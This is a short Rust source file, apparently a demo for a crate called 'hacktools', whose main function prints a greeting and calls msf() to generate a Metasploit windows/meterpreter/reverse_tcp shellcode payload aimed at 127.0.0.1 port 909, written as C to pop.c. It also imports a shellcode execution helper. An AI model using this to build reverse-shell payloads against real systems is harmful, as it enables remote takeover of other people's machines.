use std::time::Duration;
use std::io::Error;
use std::io;
use hacktools::{*, tools::{execute_shellcode, msflist}};
fn main() -> Result<(), io::Error> {
println!("Hello, world!");
msf("windows/meterpreter/reverse_tcp", "127.0.0.1", 909, "", 0, "c", "pop.c");
Ok(())
}